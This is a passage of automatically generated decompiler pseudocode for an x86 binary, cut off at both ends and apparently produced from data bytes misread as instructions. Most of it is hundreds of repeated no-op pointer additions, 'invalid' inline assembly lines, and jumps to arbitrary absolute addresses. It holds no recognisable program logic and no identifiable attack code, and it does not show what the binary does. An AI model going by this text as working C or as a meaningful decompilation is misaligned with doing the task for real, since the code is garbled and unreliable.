					 *_t240 =  *_t240 + _t240;
					 *_t240 =  *_t240 + _t240;
					 *_t240 =  *_t240 + _t240;
					 *_t240 =  *_t240 + _t240;
					 *_t240 =  *_t240 + _t240;
					asm("in al, 0x13");
					_t241 = _t240 + 1;
					 *_t363 =  *_t363 + _t241;
					 *0x401cdc00 =  *0x401cdc00 + _t241;
					 *_t241 =  *_t241 + _t241;
					 *_t241 =  *_t241 + _t241;
					_t354 = _t351 + _t351 -  *_t386 + _t351 + _t351 -  *_t386;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t241 =  *_t241 + 1;
					 *_t241 =  *_t241 + _t241;
					 *_t241 =  *_t241 + _t241;
					_push(ds);
					_t242 = _t241 + 1;
					 *((intOrPtr*)(_t242 + 0x10)) =  *((intOrPtr*)(_t242 + 0x10)) + _t242;
					_t364 = _t363 + 1;
					 *_t242 =  *_t242 + _t242;
					 *_t242 =  *_t242 + _t242;
					 *((intOrPtr*)(_t242 + 0x7e29)) =  *((intOrPtr*)(_t242 + 0x7e29)) + _t242;
					 *_t242 =  *_t242 + _t242;
					 *_t242 =  *_t242 + _t242;
					 *_t242 =  *_t242 + _t242;
					 *_t242 =  *_t242 + _t242;
					 *_t242 =  *_t242 + _t242;
					 *((intOrPtr*)(_t391 + _t378)) =  *((intOrPtr*)(_t391 + _t378)) + _t354;
					_t243 = _t242 + 1;
					 *_t364 =  *_t364 + _t243;
					 *_t386 =  *_t386 + _t243;
					_t244 = _t243 + _t354;
					asm("sbb al, 0x40");
					 *_t244 =  *_t244 + _t244;
					 *_t244 =  *_t244 + _t244;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t244 =  *_t244 + 1;
					 *_t244 =  *_t244 + _t244;
					 *((intOrPtr*)(_t244 + 0x1e)) =  *((intOrPtr*)(_t244 + 0x1e)) + _t378;
					_t245 = _t244 + 1;
					 *((intOrPtr*)(_t245 + 0x10)) =  *((intOrPtr*)(_t245 + 0x10)) + _t378;
					_t365 = _t364 + 1;
					 *_t245 =  *_t245 + _t245;
					 *_t245 =  *_t245 + _t245;
					_t246 = _t245 + _t378;
					_t356 = _t354 + _t354 -  *_t386;
					__eflags = _t356;
					do {
						if (__eflags <= 0) goto L26;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						_push(_t391);
						asm("adc al, 0x40");
						 *_t365 =  *_t365 + _t246;
						 *_t385 =  *_t385 + _t246;
						_t246 = _t246 + _t356;
						asm("sbb al, 0x40");
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						_t356 = _t356 + _t356;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *_t246 =  *_t246 + 1;
						 *_t246 =  *_t246 + _t246;
						 *((intOrPtr*)(_t246 - 0x7fffbfe2)) =  *((intOrPtr*)(_t246 - 0x7fffbfe2)) + _t246;
						asm("adc [ecx], al");
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						__eflags =  *_t246;
						asm("adc [ebx], ch");
						if ( *_t246 <= 0) goto L27;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *_t246 =  *_t246 + _t246;
						 *((intOrPtr*)(_t246 + _t246 * 2)) = ss;
						 *_t246 =  *_t246 + _t378;
						 *_t246 =  *_t246 + _t246;
						__eflags =  *_t246;
					} while (__eflags > 0);
					asm("adc [ebp+0x46211d95], ebx");
					_t247 =  *0x6014b0c8;
					asm("invalid");
					asm("salc");
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					asm("adc [edx], al");
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					 *_t247 =  *_t247 + _t247;
					_t248 = _t247 + _t378;
					asm("adc [eax], eax");
					_t392 = _t391 - 1;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t378;
					 *_t248 =  *_t248 + _t248;
					_t358 = _t356 + 1 - _t378;
					_pop(_t366);
					_t367 = _t366 |  *(_t248 + 0x41);
					 *((char*)(_t358 + _t386 * 4 - 0x6f)) = _t248;
					_t387 =  *_t392 * 0x76;
					asm("wait");
					_pop(ds);
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					 *_t248 =  *_t248 + _t248;
					_t249 = _t248 - 1;
					asm("jecxz 0x2");
					 *_t249 =  *_t249 + _t249;
					 *_t249 =  *_t249 + _t249;
					 *((intOrPtr*)(_t367 + 0x9c0040)) =  *((intOrPtr*)(_t367 + 0x9c0040)) + _t249;
					 *_t249 =  *_t249 + _t249;
					_push(_t387);
					_t379 = _t378 + 1;
					_t250 = _t249 ^ 0x2a263621;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t387 =  *_t387 + _t358;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					_t252 = _t250 |  *_t250 | 0x00000004;
					 *_t252 =  *_t252 + _t252;
					 *_t252 =  *_t252 + _t252;
					 *_t252 =  *_t252 + _t252;
					 *_t252 =  *_t252 + _t252;
					 *_t252 =  *_t252 + _t252;
					_t254 = (_t252 | 0x00000017) + 1;
					 *((intOrPtr*)(_t254 + 0x30 + _t387 * 8)) =  *((intOrPtr*)(_t254 + 0x30 + _t387 * 8)) + _t254;
					 *_t254 =  *_t254 + _t254;
					asm("invalid");
					 *_t254 =  *_t254 - 1;
					 *_t254 =  *_t254 + _t254;
					 *_t367 =  *_t367 + _t254;
					 *_t254 =  *_t254 + _t254;
					 *_t379 =  *_t379 + _t254;
					__eflags =  *_t379;
					_t255 = _t254 +  *_t254;
					 *_t255 =  *_t255 + _t255;
					goto 0x8c401579;
					asm("adc al, 0x40");
					 *((intOrPtr*)(_t379 + _t358)) =  *((intOrPtr*)(_t379 + _t358)) + _t379;
					_t256 = _t255 + 1;
					 *((intOrPtr*)( &(_t379[0x1e0010]) + _t367)) =  *((intOrPtr*)( &(_t379[0x1e0010]) + _t367)) + _t256;
					 *_t256 =  *_t256 + _t256;
					 *_t256 =  *_t256 + 0x920000;
					 *_t256 =  *_t256 + _t256;
					_t257 = _t358;
					_t359 = _t256;
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					_t68 = _t359 + 0x74;
					 *_t68 = _t379 +  *(_t359 + 0x74);
					__eflags =  *_t68;
					if(__eflags < 0) {
						L33:
						 *_t257 =  *_t257 & _t257;
						 *_t257 =  *_t257 + _t257;
						 *_t257 =  *_t257 + _t257;
						_push(ss);
						_t259 = _t257 - 1 + 1;
						 *_t367 =  *_t367 + _t259;
						 *_t259 =  *_t259 + _t259;
						 *((intOrPtr*)(_t259 + 0x16)) =  *((intOrPtr*)(_t259 + 0x16)) + _t379;
						_t257 = _t259 + 1;
						 *_t257 =  *_t257 + _t257;
						 *_t257 =  *_t257 + _t257;
						_t87 =  &(_t379[0x10]) + _t387;
						 *_t87 =  *( &(_t379[0x10]) + _t387) + _t367;
						__eflags =  *_t87;
						goto L34;
					} else {
						asm("outsb");
						asm("a16 jb 0x4");
						_push(_t385);
						_push(0x6e657469);
						if(__eflags >= 0) {
							L34:
							_push(ss);
							_t260 = _t257 + 1;
							 *_t367 =  *_t367 + _t260;
							 *_t260 =  *_t260 + _t260;
							 *((intOrPtr*)(_t260 + 0x16)) =  *((intOrPtr*)(_t260 + 0x16)) + _t379;
							_t261 = _t260 + 1;
							 *_t261 =  *_t261 + _t261;
							_t385[0x1b001a00] = _t379 + _t385[0x1b001a00];
							 *((intOrPtr*)(_t261 + 0x16)) =  *((intOrPtr*)(_t261 + 0x16)) + _t359;
							_t257 = _t261 + 1;
							_t97 = _t389 +  &(_t379[0x10]);
							 *_t97 =  *(_t389 +  &(_t379[0x10])) + _t257;
							__eflags =  *_t97;
						} else {
							asm("popad");
							asm("a16 jz 0x78");
							_t387 = _a110 * 0x67617073;
							__eflags = _t387;
							if(_t387 != 0) {
								_t387 = _t385[0xc] * 0x1000100;
								_t333 = _t257 + _t359;
								asm("sbb al, 0x40");
								 *_t333 =  *_t333 + _t333;
								 *_t333 =  *_t333 + _t333;
								 *((intOrPtr*)(_t333 + 5)) =  *((intOrPtr*)(_t333 + 5)) + _t379;
								_t376 = _t367 + 1;
								_t359 = _t359 + _t359;
								asm("invalid");
								 *_t333 =  *_t333 + 1;
								 *_t333 =  *_t333 + _t333;
								 *((intOrPtr*)(_t333 + 0x1d)) =  *((intOrPtr*)(_t333 + 0x1d)) + _t333;
								_t334 = _t333 + 1;
								 *((intOrPtr*)(_t334 + _t379)) =  *((intOrPtr*)(_t334 + _t379)) + _t376;
								_t367 = _t376 + 1;
								 *_t334 =  *_t334 + _t334;
								 *_t334 =  *_t334 + _t334;
								 *((intOrPtr*)(_t334 + 0x7e2a)) =  *((intOrPtr*)(_t334 + 0x7e2a)) + _t379;
								 *_t334 =  *_t334 + _t334;
								 *_t334 =  *_t334 + _t334;
								 *_t334 =  *_t334 + _t334;
								 *_t334 =  *_t334 + _t334;
								 *_t334 =  *_t334 + _t334;
								 *((intOrPtr*)(_t334 + 0x16)) =  *((intOrPtr*)(_t334 + 0x16)) + _t367;
								_t257 = _t334 + 1;
								 *_t367 =  *_t367 + _t257;
								 *_t257 =  *_t257 + _t257;
								_t83 = _t257 + 0x21;
								 *_t83 =  *(_t257 + 0x21) + _t367;
								__eflags =  *_t83;
								goto L33;
							}
						}
					}
					 *_t257 =  *_t257 + _t257;
					 *_t257 =  *_t257 + _t257;
					__eflags =  *_t257;
					asm("fs insb");
					if (__eflags > 0) goto L36;
					if(__eflags < 0) {
						L39:
						_t105 = _t257 - 0x4a;
						 *_t105 = _t379 +  *(_t257 - 0x4a);
						__eflags =  *_t105;
						if ( *_t105 < 0) goto L40;
						_push(_t392);
						 *_t257 =  *_t257 & _t257;
						asm("invalid");
						asm("invalid");
						 *_t257 =  *_t257 + _t257;
						 *_t257 =  *_t257 + _t257;
						_push(_t257);
						_push(ss);
						_t263 = _t379 + _t257 + 1;
						__eflags = _t263;
					} else {
						_t263 = _t257 + 1;
						 *((intOrPtr*)(_t263 + 0x40004021)) =  *((intOrPtr*)(_t263 + 0x40004021)) + _t367;
						 *_t385 =  *_t385 + _t359;
						 *((intOrPtr*)(_t263 + _t263)) =  *((intOrPtr*)(_t263 + _t263)) + _t379;
						 *_t263 =  *_t263 + _t263;
						_t392 =  &(_t392[0]);
						 *_t263 =  *_t263 & _t263;
						asm("invalid");
						asm("invalid");
						 *_t263 =  *_t263 + _t263;
						 *_t263 =  *_t263 + _t263;
						 *_t263 =  *_t263 + _t263;
						 *_t263 =  *_t263 + _t263;
						__eflags =  *_t263;
						if( *_t263 >= 0) {
							_t257 = _t263 + 1;
							__eflags = _t257;
							goto L39;
						}
					}
					asm("rcl byte [0x11800040], 1");
					_t264 = _t263 + 1;
					 *((intOrPtr*)(_t387 - 0x73ffbfef)) =  *((intOrPtr*)(_t387 - 0x73ffbfef)) + _t264;
					asm("adc [eax], eax");
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					 *_t264 =  *_t264 + _t264;
					asm("hlt");
					 *_t264 =  *_t264 + _t264;
					_t265 = _t264 + _t359;
					asm("sbb al, 0x40");
					 *_t265 =  *_t265 + _t265;
					 *_t265 =  *_t265 + _t265;
					_t267 = _t265 + _t265 + 0x8700041;
					_t368 = _t367 + 1;
					 *((intOrPtr*)(_t267 + 0x8000013)) =  *((intOrPtr*)(_t267 + 0x8000013)) + _t368;
					asm("adc [ecx], al");
					asm("invalid");
					_t268 = _t267 + 1;
					 *_t268 =  *_t268 + _t268;
					asm("adc [ecx], al");
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					_t270 = (_t268 ^ 0x00000013) + 1;
					 *_t368 =  *_t368 + _t270;
					 *_t270 =  *_t270 + _t270;
					 *_t368 =  *_t368 + _t270;
					 *_t270 =  *_t270 + _t270;
					_t271 = _t270 + _t359;
					asm("sbb al, 0x40");
					 *_t271 =  *_t271 + _t271;
					 *_t271 =  *_t271 + _t271;
					 *_t271 =  *_t271 + _t379;
					_t272 = _t271 + 0xffff0041;
					asm("invalid");
					 *_t272 =  *_t272 + _t272;
					 *_t272 =  *_t272 + _t272;
					 *0x10080040 =  *0x10080040 ^ _t359;
					_t369 = _t368 + 1;
					 *_t272 =  *_t272 + _t272;
					 *_t272 =  *_t272 + _t272;
					_t273 = _t272 + _t272;
					__eflags = _t273;
					if(_t273 < 0) {
						 *_t273 =  *_t273 + _t273;
						 *_t273 =  *_t273 + _t273;
						 *_t273 =  *_t273 + _t273;
						 *_t273 =  *_t273 + _t273;
						 *_t273 =  *_t273 + _t273;
						 *_t273 =  *_t273 + _t273;
						_t326 = _t273 + _t273;
						asm("sbb [eax], eax");
						 *_t326 =  *_t326 + _t326;
						 *_t326 =  *_t326 + _t326;
						_pop(ds);
						_t327 = _t326 + 1;
						 *_t327 =  *_t327 + _t327;
						 *_t327 =  *_t327 + _t327;
						_t328 = _t327 + _t327;
						asm("sbb [eax], eax");
						 *_t328 =  *_t328 + _t328;
						 *_t328 =  *_t328 + _t328;
						asm("enter 0x4019, 0x0");
						 *_t328 =  *_t328 + _t328;
						 *_t328 =  *_t328 + _t328;
						asm("les ebx, [ecx]");
						_t329 = _t328 + 1;
						 *0xc8000000 =  *0xc8000000 + _t329;
						asm("sbb [eax], eax");
						 *_t329 =  *_t329 + _t329;
						_t359 = 1;
						_push(0x90006c00);
						asm("sbb al, [eax]");
						__eflags = _t329 & 0x0000001c;
						_t369 = _t369 + 1;
						 *_t329 =  *_t329 + _t329;
						 *_t329 =  *_t329 + _t329;
						_t113 = 1 + _t387 * 4;
						 *_t113 =  *(1 + _t387 * 4) + _t329;
						__eflags =  *_t113;
						if (__eflags < 0) goto L43;
						if(__eflags != 0) {
							_t330 = _t329 + 1;
							_t385[0x100010] = _t385[0x100010] + _t330;
							asm("adc eax, [eax]");
							 *(_t330 ^ 0x00000000) =  *(_t330 ^ 0x00000000) + (_t330 ^ 0x00000000);
							_pop(ds);
							_t329 =  &(_t392[0]);
							 *_t379 =  *_t379 + _t329;
							 *1 =  *1 + _t329;
							 *_t329 =  *_t329 + _t329;
							 *_t329 =  *_t329 + _t329;
							 *_t329 =  *_t329 + _t329;
							 *_t329 =  *_t329 + _t329;
							_t122 =  &(_t379[0xffffffffed940011]);
							 *_t122 = _t379 + _t379[0xffffffffed940011];
							__eflags =  *_t122;
						}
						asm("sbb al, [eax]");
						_t379 = 0x7c;
						_t126 = _t385 + _t359 + 0x20040;
